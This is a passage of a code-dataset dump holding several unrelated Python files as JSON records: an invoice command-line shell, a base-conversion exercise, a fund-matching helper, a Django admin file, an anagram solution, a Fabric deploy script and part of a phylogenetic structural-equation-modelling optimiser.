argparse.ArgumentParser(prog='set',\n description='Set attribute.')\n parser_set.add_argument('attr', choices=[\n 
'currency',\n 'customer',\n 'deadline',\n 'delivered',\n 'grace',\n 'issued',\n ],\n help='Attribute to change')\n parser_set.add_argument('value', help='New value')\n def do_set(self, args):\n attr = args.attr\n if attr in ('currency', 'customer'):\n attr = attr + '_code'\n\n value = args.value\n if attr in ('delivered', 'issued'):\n value = dateutil.parser.parse(value)\n\n if attr == 'grace':\n value = int(value)\n setattr(self.invoice, attr, value)\n\n # TODO def complete_set\n\n parser_finalise = argparse.ArgumentParser(prog='finalise',\n description='Finalise invoice.')\n def do_finalise(self, args):\n self.invoice.finalise()\n return self.do_save(args)\n\n parser_finalize = parser_finalise\n do_finalize = do_finalise\n\n parser_products = argparse.ArgumentParser(prog='products',\n description='List products.')\n def do_products(self, args):\n self.stdout.write(invoice.env.get_template('products.txt').render(\n products=invoice.db.session.query(invoice.db.Product)))\n\n parser_save = argparse.ArgumentParser(prog='save',\n description='Exit to parent menu saving changes.')\n def do_save(self, args):\n invoice.db.session.commit()\n return True\n\n parser_discard = argparse.ArgumentParser(prog='discard',\n description='Exit to parent menu discarding changes.')\n def do_discard(self, args):\n invoice.db.session.rollback()\n return True\n\n def do_EOF(self, args):\n self.stdout.write(\n '\\nChoose `discard`, `save` or `finalise`; ^D does not work.\\n')\n\n# def do_debug(self, args):\n# pprint.pprint(self.invoice)\n# pprint.pprint(list(self.invoice))\n\n\nclass CmdInvoices(ArgCmd):\n intro = '''invoice {} Copyright (C) 2014-2015 Wojtek Porczyk\n\n This program comes with no warranty. This is free software,\n and you are welcome to redistribute it under certain conditions.\n See GPL-3 for details.\n'''.format(invoice.__version__)\n prompt = 'invoice> '\n\n parser_ls = argparse.ArgumentParser(prog='ls',\n description='List invoices.')\n def do_ls(self, args):\n self.stdout.write(invoice.env.get_template('invoices.txt').render(\n invoices=invoice.db.session.query(invoice.db.Invoice)) + '\\n')\n\n parser_products = argparse.ArgumentParser(prog='products',\n description='Edit products.')\n def do_products(self, args):\n 'products -- edit products database'\n CmdProducts().cmdloop()\n\n parser_show = argparse.ArgumentParser(prog='show',\n description='Show invoice.')\n parser_show.add_argument('number', metavar='NUMBER',\n help='Invoice number.')\n def do_show(self, args):\n self.stdout.write(str(invoice.db.session.query(\n invoice.db.Invoice).filter_by(number=args.number).one()) + '\\n')\n\n def complete_show(self, text, line, begidx, endidx):\n return sorted(number + ' '\n for number, in invoice.db.session.query(invoice.db.Invoice.number)\n if number.startswith(text))\n\n parser_open = argparse.ArgumentParser(prog='open',\n description='Open invoice for editing.')\n parser_open.add_argument('number', metavar='NUMBER',\n help='Invoice number.')\n def do_open(self, args):\n inv = invoice.db.session.query(\n invoice.db.Invoice).filter_by(number=args.number).one()\n if inv.finalised:\n self.stdout.write(\n 'Invoice {0} is finalised. 
Editing is not possible.\\n'\n 'Try `show {0}` or `tex {0}`.\\n\\n'.format(inv.number))\n return\n cli = CmdInvoice()\n cli.invoice = inv\n cli.cmdloop()\n complete_open = complete_show\n\n parser_unfinalise = argparse.ArgumentParser(prog='unfinalise',\n description='Unfinalise invoice.')\n parser_unfinalise.add_argument('number', metavar='NUMBER',\n help='Invoice number.')\n def do_unfinalise(self, args):\n inv = invoice.db.session.query(\n invoice.db.Invoice).filter_by(number=args.number).one()\n inv.unfinalise()\n invoice.db.session.commit()\n complete_unfinalise = complete_show\n\n parser_new = argparse.ArgumentParser(prog='new',\n description='Create new invoice')\n parser_new.add_argument('--delivered', '-d', metavar='YYYY-MM-DD',\n dest='delivered',\n type=dateutil.parser.parse, default=datetime.date.today(),\n help='Date of delivery')\n parser_new.add_argument('--issued', '-i', metavar='YYYY-MM-DD',\n dest='issued',\n type=dateutil.parser.parse, default=datetime.date.today(),\n help='Date of issue')\n parser_new.add_argument('--customer', '-c', default='ALX',\n help='Customer identificator')\n parser_new.add_argument('number', metavar='NUMBER',\n help='Number of the invoice')\n parser_new.add_argument('currency', metavar='CURRENCY',\n help='Currency of the invoice')\n parser_new.add_argument('spec', metavar='SPEC', nargs='*', default=[],\n help='Line specification in format'\n ' ,[,{price|bprice|netto|brutto}=][,vat=]')\n\n def do_new(self, args):\n inv = invoice.db.Invoice(\n number=args.number,\n currency_code=args.currency,\n customer_code=args.customer,\n delivered=args.delivered,\n issued=args.issued)\n for spec in args.spec:\n inv.add_line_from_spec(spec)\n\n invoice.db.session.add(inv)\n invoice.db.session.flush()\n\n cli = CmdInvoice()\n cli.invoice = inv\n cli.cmdloop()\n\n parser_del = argparse.ArgumentParser(prog='del',\n description='Delete an invoice from the database.')\n parser_del.add_argument('number', metavar='NUMBER',\n help='Invoice number.')\n def do_del(self, args):\n 'del -- delete invoice from the database'\n invoice.db.session.delete(invoice.db.session.query(\n invoice.db.Invoice).filter_by(number=args.number).one())\n invoice.db.session.commit()\n complete_del = complete_show\n\n parser_pdf = argparse.ArgumentParser(prog='pdf',\n description='Create PDF using ConTeXt.')\n parser_pdf.add_argument('number', metavar='NUMBER',\n help='Invoice number.')\n parser_pdf.add_argument('locale', metavar='LOCALE',\n nargs='?', choices=('pl_PL', 'en_GB'),\n help='Invoice language.')\n def do_pdf(self, args):\n inv = invoice.db.session.query(\n invoice.db.Invoice).filter_by(number=args.number).one()\n texfile = invoice.config.get_invoice_file(inv.number, '.tex')\n\n open(texfile, 'w').write(inv.tex(args.locale))\n result = subprocess.call(\n ['context', '--batch', '--noconsole', texfile],\n cwd=invoice.config.invoicespath)\n\n try:\n os.unlink(invoice.config.get_invoice_file(inv.number, '.tuc'))\n except:\n pass\n try:\n os.unlink(invoice.config.get_invoice_file(inv.number, '.log'))\n except:\n pass\n\n if result:\n self.stdout.write('Creating PDF failed.\\n\\n')\n return False\n\n complete_pdf = complete_show\n\n parser_display = argparse.ArgumentParser(prog='tex',\n description='Display PDF.')\n parser_display.add_argument('number', metavar='NUMBER',\n help='Invoice number.')\n def do_display(self, args):\n if self.do_pdf(args) is False:\n return\n inv = invoice.db.session.query(\n invoice.db.Invoice).filter_by(number=args.number).one()\n pdffile = 
invoice.config.get_invoice_file(inv.number, '.pdf')\n subprocess.call(['evince', pdffile])\n complete_display = complete_show\n\n# parser_sign = argparse.ArgumentParser(prog='sign',\n# description='Create signed invoice.')\n# parser_sign.add_argument('number', metavar='NUMBER',\n# help='Invoice number.')\n# def do_sign(self, args):\n# invoice = Invoice(args.number).load(_db).load_lines(_db)\n# try:\n# asc = str(gnupg.GPG().sign(str(invoice) + '\\n', clearsign=True))\n# except:\n# self.stdout.write('Signing failed.\\n\\n')\n# return\n\n# filename = config.get_invoice_file(invoice.number, '.asc')\n# open(filename, 'w').write(asc)\n# self.stdout.write(asc + '\\n')\n# complete_sign = complete_show\n\n parser_customers = argparse.ArgumentParser(prog='customers',\n description='List customers.')\n def do_customers(self, args):\n self.stdout.write(invoice.env.get_template('customers.txt').render(\n customers=invoice.db.session.query(invoice.db.Customer)))\n\n parser_mail = argparse.ArgumentParser(prog='mail',\n description='Mail PDF with invoice to the contact e-mail address.')\n parser_mail.add_argument('number', metavar='NUMBER',\n help='Invoice number.')\n def do_mail(self, args):\n # TODO integrate with customers from LDAP\n # TODO qubes-rpc\n if self.do_pdf(args) is False:\n return\n inv = invoice.db.session.query(\n invoice.db.Invoice).filter_by(number=args.number).one()\n pdffile = invoice.config.get_invoice_file(inv.number, '.pdf')\n subprocess.call(['mutt',\n '-s', 'Faktura VAT ' + inv.number,\n '-a', pdffile,\n '--', inv.customer.mail])\n complete_mail = complete_show\n\n parser_init = argparse.ArgumentParser(prog='init',\n description='Initialise database.')\n def do_init(self, args):\n# with open(os.path.expanduser(config.dbfilename), 'ab'):\n# pass\n invoice.db.init()\n\n parser_exit = argparse.ArgumentParser(prog='exit',\n description='Exit from invoice shell.')\n def do_exit(self, args):\n return True\n\n def do_EOF(self, args):\n self.stdout.write('\\n')\n return True\n\n# def do_debug(self, args):\n# pprint.pprint(Invoices(_db, index=True))\n\n\ndef main():\n import readline\n readline.set_completer_delims(\n ''.join(c for c in readline.get_completer_delims() if c not in '-/'))\n CmdInvoices().cmdloop()\n\nif __name__ == '__main__':\n main()\n\n# vim: ts=4 sts=4 sw=4 et\n","sub_path":"invoice/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":23147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"389519699","text":"# Convert_base.cpp b4b3a70d8ab942579f85b4416f980d05831af969\nimport sys\nimport random\nimport string\n\n\n# @include\ndef convert_base(s, b1, b2):\n is_negative = s[0] == '-'\n x = 0\n for c in s[1 if is_negative else 0:]:\n x *= b1\n x += ord(c) - ord('0') if c.isdigit() else ord(c) - ord('A') + 10\n\n result = []\n while True:\n x, reminder = divmod(x, b2)\n result.append(chr(ord('A') + reminder - 10) if reminder >= 10 else chr(ord('0') + reminder))\n if x == 0:\n break\n\n if is_negative: # s is a negative number.\n result.append('-')\n\n return ''.join(reversed(result))\n# @exclude\n\n\ndef rand_int_string(length):\n if length == 0:\n return '0'\n ret = []\n if random.randint(0, 1) == 1:\n ret.append('-')\n ret.append(chr(random.randint(ord('1'), ord('9'))))\n for _ in range(length-1):\n ret.append(random.choice(string.digits))\n return ''.join(ret)\n\n\ndef main():\n if len(sys.argv) == 4:\n input_str = sys.argv[1]\n print(convert_base(input_str, int(sys.argv[2]), int(sys.argv[3])))\n assert 
input_str == convert_base(\n convert_base(input_str, int(sys.argv[2]), int(sys.argv[3])),\n int(sys.argv[3]), int(sys.argv[2]))\n else:\n for _ in range(1000):\n input_str = rand_int_string(random.randint(1, 9))\n base = random.randint(2, 16)\n print('input is %s, base1 = 10, base2 = %d, result = %s' %\n (input_str, base, convert_base(input_str, 10, base)))\n assert input_str == convert_base(convert_base(input_str, 10, base), base, 10)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"solutions/python/convert_base.py","file_name":"convert_base.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"151331019","text":"# finds and applies correct fund based on user specified rules\r\nimport logging\r\n\r\nimport babelstore as db\r\n\r\n# create logger\r\nmodule_logger = logging.getLogger('babel_logger.fund')\r\n\r\n\r\ndef find_fund(library_id, funds_str, audn_id, matType_id, location_id):\r\n # retrieve branch id\r\n location_record = db.retrieve_record(\r\n db.Location,\r\n id=location_id)\r\n # separates the funds applied on the form\r\n fund_lst = funds_str.split('+')\r\n ids = set()\r\n\r\n for fund in fund_lst:\r\n # print 'fund', fund, 'branch_id', location_record.branch_id\r\n criteria = {'branch_match': False,\r\n 'matType_match': False,\r\n 'audn_match': False}\r\n fund_record = db.retrieve_record(\r\n db.Fund,\r\n library_id=library_id,\r\n code=fund)\r\n # fund_record.branches\r\n # fund_record.matTypes\r\n # fund_record.audns\r\n\r\n for fund_branch in fund_record.branches:\r\n if fund_branch.branch_id == location_record.branch_id:\r\n criteria['branch_match'] = True\r\n # print 'branch', criteria\r\n # fund_record = db.retrieve_all(\r\n # db.Fund,\r\n # 'matTypes',\r\n # library_id=library_id,\r\n # code=fund)\r\n for fund_matType in fund_record.matTypes:\r\n if fund_matType.matType_id == matType_id:\r\n criteria['matType_match'] = True\r\n # print 'matType', criteria\r\n # fund_record = db.retrieve_all(\r\n # db.Fund,\r\n # 'audns',\r\n # library_id=library_id,\r\n # code=fund)\r\n for fund_audn in fund_record.audns:\r\n if fund_audn.audn_id == audn_id:\r\n criteria['audn_match'] = True\r\n # print 'audn', criteria\r\n # print 'final', criteria\r\n\r\n if criteria['branch_match'] is True \\\r\n and criteria['matType_match'] is True \\\r\n and criteria['audn_match'] is True:\r\n ids.add(fund_record.id)\r\n\r\n if len(ids) == 1:\r\n return (True, list(ids)[0])\r\n elif len(ids) == 0:\r\n module_logger.exception(\r\n \"FUND: fund(s) (%s) not applicable for this type of material\" % fund_lst)\r\n return (False, 'not able to correctly apply one of the funds')\r\n else:\r\n module_logger.exception('FUND: applied funds (%s) are not exclusive' % fund_lst)\r\n return (False, 'multiple fund matches, funds not exclusive')\r\n","sub_path":"fund_applicator.py","file_name":"fund_applicator.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"264532989","text":"from django.contrib import admin\nfrom .models import company,remarks\n# Register your models here.\n\n\nclass remarksInline(admin.StackedInline):\n model = remarks\n\nclass courseadmin(admin.ModelAdmin):\n inlines = 
[remarksInline,]\nadmin.site.register(company)\nadmin.site.register(remarks)","sub_path":"Diary_Portal/diary/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"90357136","text":"# Given two strings s and t , write a function to determine if t is an anagram of s.\n#\n# Example 1:\n#\n#\n# Input: s = \"anagram\", t = \"nagaram\"\n# Output: true\n#\n#\n# Example 2:\n#\n#\n# Input: s = \"rat\", t = \"car\"\n# Output: false\n#\n#\n# Note:\n# You may assume the string contains only lowercase alphabets.\n#\n# Follow up:\n# What if the inputs contain unicode characters? How would you adapt your solution to such case?\n#\n\n\nclass Solution:\n def isAnagram(self, s, t):\n \"\"\"\n :type s: str\n :type t: str\n :rtype: bool\n \"\"\"\n ls = list(s)\n lt = list(t)\n ls.sort()\n lt.sort()\n return ls == lt\n \n","sub_path":"242-valid-anagram/valid-anagram.py","file_name":"valid-anagram.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"399255126","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\nThis file is used to make certain development tasks less annoying.\n\nTo take full advantage of it, you'll need Python, Fabric, Java, Ruby\nand Haml.\n\"\"\"\n\nfrom os.path import dirname, join, realpath\n\nfrom fabric.api import cd, env, local, put, run\n\n\n__author__ = 'Maciej Konieczny '\n\n\nREPO_DIR = dirname(realpath(__file__))\nDEMO_DIR = join(REPO_DIR, 'demo')\nPLUGIN_DIR = join(REPO_DIR, 'plugin')\n\nCOMPILER_PATH = join(REPO_DIR, 'closure-compiler/compiler.jar')\nPLUGIN_PATH = join(PLUGIN_DIR, 'jquery.typing.js')\nCOMPRESSED_PLUGIN_PATH = join(PLUGIN_DIR, 'jquery.typing.min.js')\n\n\nenv.hosts = ['narf.megiteam.pl']\n\n\ndef build():\n \"\"\"\n Create compressed version of the plugin and build demo.\n \"\"\"\n\n compress()\n demo()\n\n\ndef compress():\n \"\"\"\n Create compressed version of the plugin.\n \"\"\"\n\n # compress\n local('java -jar {0} --js={1} --js_output_file={2}'.format(\n COMPILER_PATH, PLUGIN_PATH, COMPRESSED_PLUGIN_PATH))\n\n # copy info comment from development version\n info = ''\n with open(PLUGIN_PATH) as f:\n for line in f:\n if line.startswith('//'):\n info += line\n\n # add info comment to compressed version\n if info:\n with open(COMPRESSED_PLUGIN_PATH) as f:\n compressed = f.read()\n\n with open(COMPRESSED_PLUGIN_PATH, 'w') as f:\n f.write(info + compressed)\n\n\ndef demo():\n \"\"\"\n Build demo.\n \"\"\"\n\n # copy compressed plugin\n local('cp {0} {1}'.format(COMPRESSED_PLUGIN_PATH, DEMO_DIR))\n\n # render haml\n haml = join(DEMO_DIR, 'demo.haml')\n html = join(DEMO_DIR, 'index.html')\n local('haml {0} > {1}'.format(haml, html))\n\n\ndef deploy():\n \"\"\"\n Update MegiTeam and push to GitHub.\n \"\"\"\n\n # update MegiTeam\n megi()\n\n # push to GitHub\n local('git push --tags')\n\n\ndef megi():\n \"\"\"\n Update MegiTeam.\n \"\"\"\n\n # archive demo\n archive_name = 'typing.tar.bz2'\n archive_path = '/tmp/' + archive_name\n with cd(DEMO_DIR):\n local('tar -cj --exclude *.haml -f {0} *'.format(archive_path))\n\n # set remote directory names\n main_dir = 'narf.pl/main/on-the-stage'\n typing_dir_name = 'jquery-typing'\n typing_dir = join(main_dir, typing_dir_name)\n\n # create jQuery-typing directory\n with cd(main_dir):\n run(\"\"\"if [ -d {0} ]; then\n rm -rf {0}/*\n else\n mkdir {0}\n fi\"\"\".format(typing_dir_name))\n\n # upload\n 
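# Fabric's put() uploads the local archive to the remote host over SFTP;\n # local() above ran on the workstation, while the run() calls below execute\n # on the server to unpack the archive and clean up.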
put(archive_path, typing_dir)\n\n # extract and remove remote archive\n with cd(typing_dir):\n run('tar xf ' + archive_name)\n run('rm ' + archive_name)\n\n # remove local archive\n local('rm ' + archive_path)\n","sub_path":"fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"236611328","text":"import numpy as np\nfrom sem_model import SEMData, SEMModel\nfrom sem_opt_classic import SEMOptClassic\nfrom sem_opt_abc import SEMOptABC\nfrom ete3 import Tree\nfrom typing import List\nfrom sem_opt_bayes import SEMOptBayes\nfrom itertools import combinations_with_replacement, combinations\nfrom functools import reduce\nfrom scipy.stats import invwishart, invgamma, wishart, norm, uniform, multivariate_normal\nfrom functools import partial\n\n\nclass SEMModelNode(SEMModel):\n \"\"\" Class node contain also covariance matrix as parameters\"\"\"\n def __init__(self, file_model):\n \"\"\"\n\n :param file_model:\n \"\"\"\n\n super().__init__(file_model)\n\n # Save parameters\n self.n_param_mod = self.n_param\n # Add values in the covariance matrix as parameters\n self.matrices['Cov'] = self.set_cov()\n\n\n\n def set_cov(self):\n \"\"\"\n Set additional parameters of a covariance matrix\n :return:\n \"\"\"\n v_mpart = self.d_vars['MPart']\n n_mpart = len(v_mpart)\n for p in combinations_with_replacement(range(n_mpart), 2):\n self.add_parameter('Cov', p[0], p[1])\n\n m_cov = np.zeros((n_mpart, n_mpart))\n return m_cov\n\n\n def load_initial_dataset(self, data: SEMData):\n \"\"\"\n Load dataset: call super method and\n :param data:\n :return:\n \"\"\"\n super().load_initial_dataset(data)\n\n m_cov = data.m_cov\n for i, position in self.param_pos.items():\n mx_type, pos1, pos2 = position\n if mx_type is not 'Cov':\n continue\n self.param_val[i] = m_cov[pos1, pos2]\n\n\n def update_all(self, params=None):\n \"\"\"\n\n :param params:\n :return:\n \"\"\"\n # Param-checker is within super-function\n super().update_all(params)\n\n if params is None:\n params = self.param_val\n\n for i, position in self.param_pos.items():\n mx_type, pos1, pos2 = position\n if mx_type is 'Cov':\n self.matrices[mx_type][pos1, pos2] = params[i]\n self.matrices[mx_type][pos2, pos1] = params[i]\n\n def get_cov_param(self, m_cov, id_mod):\n mx_type, pos1, pos2 = self.param_pos[id_mod]\n if mx_type != 'Cov':\n raise ValueError('This is not a cell within Cov Matrix')\n return m_cov[pos1, pos2]\n\nclass SEMTreeNode:\n def __init__(self, node_type):\n \"\"\"\n\n :param node_type:\n \"\"\"\n self.type = node_type\n self.dist = []\n\n def add_dist(self, name, dist):\n \"\"\"\n :param name:\n :param dist:\n :return:\n \"\"\"\n self.dist += [(name, dist)]\n\n\n\nclass SEMTree:\n\n def __init__(self, dataset: List[SEMData], file_name):\n \"\"\"\n This function creates the\n :param data:\n :param file_name:\n \"\"\"\n\n tree = Tree(file_name)\n\n self.nodes = dict()\n self.n_nodes = 0\n\n\n self.nodes['N0'] = SEMTreeNode('node')\n self.nodes['N0'].add_dist('N1', 20.8)\n self.nodes['N0'].add_dist('N3', 20.8)\n\n self.nodes['N1'] = SEMTreeNode('node')\n self.nodes['N1'].add_dist('N0', 20.8)\n self.nodes['N1'].add_dist('N2', 33.7)\n self.nodes['N1'].add_dist('NKL', 112.3)\n self.nodes['N1'].add_dist('B19', 112.3)\n\n self.nodes['NKL'] = SEMTreeNode('leaf')\n self.nodes['NKL'].add_dist('N1', 112.3)\n\n self.nodes['B19'] = SEMTreeNode('leaf')\n self.nodes['B19'].add_dist('N1', 112.3)\n\n self.nodes['N2'] = 
SEMTreeNode('node')\n self.nodes['N2'].add_dist('N1', 33.7)\n self.nodes['N2'].add_dist('CD4', 78.6)\n self.nodes['N2'].add_dist('CD8', 78.6)\n\n self.nodes['CD4'] = SEMTreeNode('leaf')\n self.nodes['CD4'].add_dist('N2', 78.6)\n\n self.nodes['CD8'] = SEMTreeNode('leaf')\n self.nodes['CD8'].add_dist('N2', 78.6)\n\n self.nodes['N3'] = SEMTreeNode('node')\n self.nodes['N3'].add_dist('N0', 20.8)\n self.nodes['N3'].add_dist('MON', 41.8)\n self.nodes['N3'].add_dist('NEU', 112.3)\n\n self.nodes['NEU'] = SEMTreeNode('leaf')\n self.nodes['NEU'].add_dist('N3', 112.3)\n\n self.nodes['MON'] = SEMTreeNode('leaf')\n self.nodes['MON'].add_dist('N3', 41.8)\n self.nodes['MON'].add_dist('DEN', 70.5)\n self.nodes['MON'].add_dist('MRF', 70.5)\n\n self.nodes['MRF'] = SEMTreeNode('leaf')\n self.nodes['MRF'].add_dist('MON', 70.5)\n\n self.nodes['DEN'] = SEMTreeNode('leaf')\n self.nodes['DEN'].add_dist('MON', 70.5)\n\n\n # self.get_nodes(tree)\n print(tree)\n\n # # Compare names of datasets and leaves of the tree\n # data_names = [data.name for data in dataset]\n # print(data_names)\n # for name in data_names:\n # if name not in self.nodes.keys():\n # raise ValueError('Dataset and Tree do not match')\n\n\n\n def get_nodes(self, tree):\n \"\"\"\n Recursive function to get all nodes and distances between them\n :param tree:\n :return:\n \"\"\"\n if tree.name == '':\n tree.name = 'N' + str(self.n_nodes)\n self.n_nodes += 1\n self.nodes[tree.name] = SEMTreeNode('node')\n else:\n self.nodes[tree.name] = SEMTreeNode('leaf')\n\n if tree.up is not None:\n name_p = tree.up.name # parent\n name_c = tree.name # children\n dist = tree.dist\n\n self.nodes[name_p].add_dist(name_c, dist)\n self.nodes[name_c].add_dist(name_p, dist)\n\n for node in tree.children:\n self.get_nodes(node)\n return\n\n\nclass Parameter:\n def __init__(self, node_name=None, mx_type=None, id_opt=None, id_mod=None):\n\n self._node_name = ''\n self._mx_type = ''\n self._id_opt = -1\n self._id_mod = -1\n\n if node_name is not None:\n self.node_name = node_name\n\n if mx_type is not None:\n self.mx_type = mx_type\n\n if id_opt is not None:\n self.id_opt = id_opt\n\n if id_mod is not None:\n self.id_mod = id_mod\n\n\n @property\n def mx_type(self):\n return self._mx_type\n\n @mx_type.setter\n def mx_type(self, mx_type):\n self._mx_type = mx_type\n\n @property\n def node_name(self):\n return self._node_name\n\n @node_name.setter\n def node_name(self, node_name):\n self._node_name = node_name\n\n @property\n def id_opt(self):\n return self._id_opt\n\n @id_opt.setter\n def id_opt(self, id_opt):\n self._id_opt = id_opt\n\n @property\n def id_mod(self):\n return self._id_mod\n\n @id_mod.setter\n def id_mod(self, id_mod):\n self._id_mod = id_mod\n\n def set_param(self, node_name, mx_type, id_opt, id_mod):\n self.node_name = node_name\n self.mx_type = mx_type\n self.id_opt = id_opt\n self.id_mod = id_mod\n\n\nclass SEMOptPhylo:\n\n def __init__(self,\n mod_node: SEMModelNode,\n dataset: List[SEMData],\n tree: SEMTree,\n estimator='From_Root'):\n \"\"\"\n\n :param mod_leaf:\n :param mod_node:\n :param dataset:\n :param tree:\n \"\"\"\n # Save Tree nodes\n self.tree = tree.nodes\n\n # Function to pump parameters through matrices\n self.get_matrices = mod_node.get_matrices\n self.get_cov_param = mod_node.get_cov_param\n self.n_param_mod = mod_node.n_param\n\n # Required Data\n self.m_profiles = {data.name: data.m_profiles for data in dataset}\n self.m_cov = {data.name: data.m_cov for data in dataset} # Covariance matrix\n\n # Get prior distributions\n # For this 
purpose ML-Wishard optimisation must be performed\n self.param_leaf = dict()\n for data in dataset:\n estimator_classic = 'MLW'\n try:\n opt_classic = SEMOptClassic(mod_node, data,\n estimator_classic)\n opt_classic.optimize()\n except:\n raise ValueError('SEM models within leaves do not converge')\n self.param_leaf[data.name] = opt_classic.params\n\n\n # Create all of the params\n self.param_pos = []\n self.param_val = []\n self.n_params = 0\n self.get_params(tree, mod_node)\n\n\n # Get priors for Beta, Lambda, Psi and Theta matrices\n self.p_psi_df, self.p_psi_cov = self.prior_params_psi()\n self.p_beta_mean, self.p_beta_cov = self.prior_params_coefs('Beta')\n self.p_theta_alpha, self.p_theta_beta = self.prior_params_theta()\n self.p_lambda_mean, self.p_lambda_cov = self.prior_params_coefs('Lambda')\n self.p_tree_alpha, self.p_tree_beta = self.prior_params_tree()\n\n # Starting values of parameters\n self.set_params(mod_node, dataset)\n\n # Options for the optimisation\n self.param_chain = np.array([self.param_val])\n self.loss_func = self.get_loss_function(estimator)\n\n print(\"SEMOptPhylo is successfully created\")\n\n\n def loss_functions(self) -> dict:\n \"\"\"\n Create the dictionary of possible functions\n :return:\n \"\"\"\n tmp_dict = dict()\n tmp_dict['From_Root'] = (('Cov', self.log_post_cov, self.constraint_cov),\n ('Beta', self.log_post_beta, self.constraint_sigma),\n ('Lambda', self.log_post_lambda, self.constraint_sigma),\n ('Psi', self.log_post_psi, self.constraint_psi),\n ('Theta', self.log_post_theta, self.constraint_theta),\n ('Tree', self.log_post_tree, self.constraint_tree))\n\n tmp_dict['Likelihood'] = (self.log_likelihood, ('Psi',\n 'Beta',\n 'Theta',\n 'Lambda'))\n return tmp_dict\n\n def get_loss_function(self, name):\n loss_dict = self.loss_functions()\n if name in loss_dict.keys():\n return loss_dict[name]\n else:\n raise Exception(\"SEMOpt_phylo Backend doesn't support loss function {}.\".format(name))\n\n\n def optimise(self):\n\n params_init = np.array(self.param_val)\n params_opt = np.array(self.param_val)\n\n\n for n_iter in range(200):\n print(n_iter)\n\n for mx_type, log_prob, constraint_func in self.loss_func:\n\n if mx_type in {'Theta', 'Psi'}: # Common parameters for all nodes\n node_order = [list(self.tree.keys())[0]]\n elif mx_type == 'Tree':\n node_order = [mx_type]\n mx_type = ['Beta', 'Lambda', 'Cov']\n else:\n leaf_names = list(self.m_profiles.keys())\n all_names = list(self.tree.keys())\n node_names = list(set(all_names) - set(leaf_names))\n node_names.sort(reverse=True)\n node_order = leaf_names + node_names\n\n for node_name in node_order:\n # print(node_name, mx_type)\n params_opt = self.metropolis_hastings(node_name,\n mx_type,\n log_prob,\n constraint_func,\n params_opt)\n\n self.param_chain = np.append(self.param_chain, [params_opt], axis=0)\n\n self.param_val = params_opt\n\n prob_init = self.log_joint(params_init)\n prob_final = self.log_joint(params_opt)\n return prob_init, prob_final\n\n\n def metropolis_hastings(self, node_name, mx_type, log_prob, constraint_func, params_opt):\n params_new = np.array(params_opt)\n\n for pos in self.param_pos:\n if (pos.mx_type not in mx_type) or (pos.node_name not in node_name):\n continue\n # print(node_name, mx_type)\n # print(pos.id_opt)\n p = params_opt[pos.id_opt]\n\n # Try five times to get a parameter which satisfies the constraint\n for _ in range(5):\n p_new = norm.rvs(p, 0.05, 1)\n params_new[pos.id_opt] = p_new\n # Constraint\n if constraint_func(params_new, node_name) == 0:\n break\n # If 
the required value was not sampled - do not accept it\n if constraint_func(params_new, node_name) < 0:\n params_new[pos.id_opt] = p\n continue\n\n\n # Calculate the Metropolis-Hastings statistic\n mh_log_stat = np.exp(log_prob(params_new, node_name) -\n log_prob(params_opt, node_name))\n # print('1', log_prob(params_new, node_name), node_name)\n # print('2', log_prob(params_opt, node_name), node_name)\n # print(node_name, mx_type)\n\n if (mh_log_stat < uniform.rvs(0, 1, 1)) \\\n or (mh_log_stat == 1):\n # Reject new value\n params_new[pos.id_opt] = p\n else:\n print(node_name, pos.mx_type, mh_log_stat)\n # Accept new value\n params_opt[pos.id_opt] = params_new[pos.id_opt]\n\n return params_new\n\n\n def get_node_params(self, params_opt, node_name):\n params_mod = np.zeros(self.n_param_mod)\n for p in self.param_pos:\n if p.node_name not in node_name:\n continue\n params_mod[p.id_mod] = params_opt[p.id_opt]\n return params_mod\n\n\n def set_node_params(self, params_mod, params_opt, node_name):\n\n for p in self.param_pos:\n if p.node_name not in node_name:\n continue\n params_opt[p.id_opt] = params_mod[p.id_mod]\n\n\n def get_id_opt(self, node_name, id_mod):\n for pos in self.param_pos:\n if pos.node_name == node_name and pos.id_mod == id_mod:\n return pos.id_opt\n return None\n\n\n def log_joint(self, params) -> List:\n pass\n\n\n def log_likelihood(self, params_opt, node_name):\n params_node = self.get_node_params(params_opt, node_name)\n m_sigma = self.calculate_sigma(params_node)\n if node_name in self.m_cov.keys():\n m_cov = self.m_cov[node_name]\n else:\n m_cov = self.get_matrices(params_node, 'Cov')\n df = sum([p.shape[0] for _, p in self.m_profiles.items()])\n w = wishart.logpdf(m_cov, df=df, scale=m_sigma/df)\n return w\n\n\n def log_edge(self, node_name1, node_name2, dist, params_opt):\n # Get positions of parameters which evolve among the phylotree\n pos_evolve = [p for p in self.param_pos if p.node_name == 'Tree']\n prob_edge = 0\n for pos in pos_evolve:\n\n\n if (node_name1 in self.m_cov.keys()) and (pos.mx_type == 'Cov'):\n x = self.get_cov_param(self.m_cov[node_name1], pos.id_mod)\n else:\n id_opt_node1 = self.get_id_opt(node_name1, pos.id_mod)\n if id_opt_node1 is None:\n raise ValueError('None index returned')\n x = params_opt[id_opt_node1]\n\n\n if (node_name2 in self.m_cov.keys()) and (pos.mx_type == 'Cov'):\n m = self.get_cov_param(self.m_cov[node_name2], pos.id_mod)\n else:\n id_opt_node2 = self.get_id_opt(node_name2, pos.id_mod)\n if id_opt_node2 is None:\n raise ValueError('None index returned')\n m = params_opt[id_opt_node2]\n\n s = params_opt[pos.id_opt]\n\n # print('edge_x', x, id_opt_node1, node_name1, pos.id_mod)\n\n prob_edge += norm.logpdf(x, m, s*dist)\n # print('prob_edge', prob_edge)\n if s < 0:\n self.param_val = params_opt\n raise ValueError('Negative Variance')\n return prob_edge\n\n\n def log_post_beta(self, params_opt, node_name):\n prob_beta = 